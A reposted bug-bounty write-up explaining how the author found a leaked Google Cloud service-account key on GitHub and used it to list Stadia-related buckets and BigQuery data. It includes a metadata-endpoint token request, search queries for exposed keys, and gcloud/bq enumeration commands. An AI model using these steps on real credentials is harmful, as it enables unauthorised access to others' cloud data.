[Repost] [Vulnerability Analysis] Gaining Access To GCP Of Google Stadia — 500$ Bounty

Introduction

First of all, I must admit that the story is a bit old. It took place in July 2019.

At that time, I had learnt the approach of machine-based authentication in the cloud. In particular, reading disclosed HackerOne reports on server-side request forgery and similar vulnerabilities was the key to my success: they demonstrate the technique of gaining access to the cloud provider by connecting to the internal metadata endpoint, retrieving a service account token, and using the exfiltrated service account / token to authenticate from outside. This led me to the idea that instead of searching for SSRF (or related) vulnerabilities in a single target, I should try my luck in the big wide world of OSINT.
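
On GCP, that technique boils down to a request like the following against the internal metadata endpoint (this is the documented endpoint path; the Metadata-Flavor header is mandatory, so an SSRF payload has to be able to set it):

curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"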

As far as I can remember, GitHub was not scanning for exposed tokens at that time, so encountering exposed credentials was painless.

Finding a search query

The first step is, of course, to find a way to locate these service accounts. My approach is to find a unique string in the target to narrow down the search results. For example, long-term AWS IAM access key IDs begin with AKIA and temporary credentials with ASIA. Google service accounts were unknown to me, so I needed to look up their structure and identify potential needles.

https://cloud.google.com/iam/docs/creating-managing-service-account-keys

All service-account-email values apparently end with iam.gserviceaccount.com according to the Google Cloud documentation.

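For reference, a service account key file downloaded from GCP is a JSON document along these lines (the field names follow the documentation linked above; every value below is a made-up placeholder):

{
  "type": "service_account",
  "project_id": "example-project",
  "private_key_id": "0123456789abcdef0123456789abcdef01234567",
  "private_key": "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n",
  "client_email": "some-name@example-project.iam.gserviceaccount.com",
  "client_id": "123456789012345678901",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token"
}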

Searching with that needle really improved the quality of the GitHub search results. Nonetheless, there is still room for improvement. For instance, since the service account is often a JSON structure, it is not hard to imagine that a GitHub user exposes their service account in a .json file. The search query could look like this:

iam.gserviceaccount.com extension:json

It is of course possible that a Google service account is stored in other file formats.

In my case, the service account token was written inside a .yaml file (the file was used by a DevOps automation tool).
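
Adjusting the extension qualifier covers those cases as well, for example (these variants are plausible guesses rather than the exact queries I used):

iam.gserviceaccount.com extension:yaml
iam.gserviceaccount.com extension:yml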

Using the Google Cloud Service Account

At this point, the owner of the Google service account was still unclear and I needed a way to identify the owner. Wouldn’t it be great if AWS or any similar credential issuer allowed security researchers to look up the owner? I guess there would be some sort of privacy implication, but it would really help in some cases.

I use a variety of tools to identify the owner. I haven’t found any easier way than listing all Google Cloud resources and then trying to associate the data with a company.

To begin with, the Google Cloud command-line interface together with a small script is a great help. I start by revoking any previous access tokens from my environment (because you don’t want to target older findings).

gcloud auth revoke --all

Next, I copy the exposed service account into a JSON file (assuming the original service account is also JSON; otherwise you might need to fiddle around) and tell gcloud to use it.

gcloud auth activate-service-account --key-file service-account.json

gcloud also needs to know the project ID, which can be retrieved from the project_id field of the JSON file.

gcloud config set project your-project-name

Finally, you can use the command-line interface to communicate with Google Cloud.

Instead of manually querying every Google Cloud resource, I found it very convenient to just use the following script: https://gist.github.com/carnal0wnage/757d19520fcd9764b24ebd1d89481541 (you need to change the project ID on line 4).
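
I won’t reproduce the gist here, but the idea behind that kind of enumeration script is simply to run every read-only list command the credentials might be allowed to use. A minimal sketch (not the gist itself; gsutil and bq ship with the Cloud SDK):

# enumerate the most interesting resource types in the active project
gsutil ls                         # Cloud Storage buckets
gcloud compute instances list     # Compute Engine VMs
gcloud iam service-accounts list  # other service accounts in the project
bq ls                             # BigQuery datasets in the default project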

Another option is ScoutSuite from NCC Group; you can find it at https://github.com/nccgroup/ScoutSuite. It might give you even better results, but in my opinion the script allows a quicker overview.

Note: Your service account might have access to other projects. It is a good idea to list all accessible projects with gcloud projects list and to check each project for information.
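
A small shell loop makes that systematic (a minimal sketch; gcp_enum.sh stands in for whatever enumeration script you use, such as the gist above):

for project in $(gcloud projects list --format="value(projectId)"); do
  gcloud config set project "$project"
  bash gcp_enum.sh >> "out-$project.txt"
done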

I like to have the dumped information in a code editor for an easier overview. You can accomplish that by piping the output into a file like this:

bash gcp_enum.sh >> out.txt

(Screenshot: the first 48 lines of the output.)

The output size was astonishing: 109,818 lines, of which 108,466 are buckets. Many buckets were boring because they were suffixed buckets; maybe “versioned” buckets for log files?

(Screenshot: 108,150 of the buckets are suffixed buckets.)

The other 316 buckets had interesting names, containing the words “backup”, “prod”, “automation”, “jenkins”, “stadia” + “backups”, “logs”, “gpg”, “ssh”, “deployments”, “scripts”, “dumps” and more.
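
Assuming the bucket lines in out.txt start with gs://, a quick grep surfaces those names (the keyword list is reconstructed from the words above):

grep "gs://" out.txt \
  | grep -E "backup|prod|automation|jenkins|stadia|logs|gpg|ssh|deployments|scripts|dumps"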

I not only had access to these buckets but also to BigQuery and other cloud resources.
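
For BigQuery, the bq tool can walk the accessible data (some_dataset and some_table are placeholders, not the real Stadia identifiers):

bq ls --project_id your-project-name                 # list datasets in the project
bq ls your-project-name:some_dataset                 # list tables inside a dataset
bq head your-project-name:some_dataset.some_table    # preview rows of a table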

(Screenshot: Stadia Analytics dataset in BigQuery.)

At that time, I was really happy and thought that access to production data would earn me a good amount of $$$$$, but Google paid me a bounty of $500.
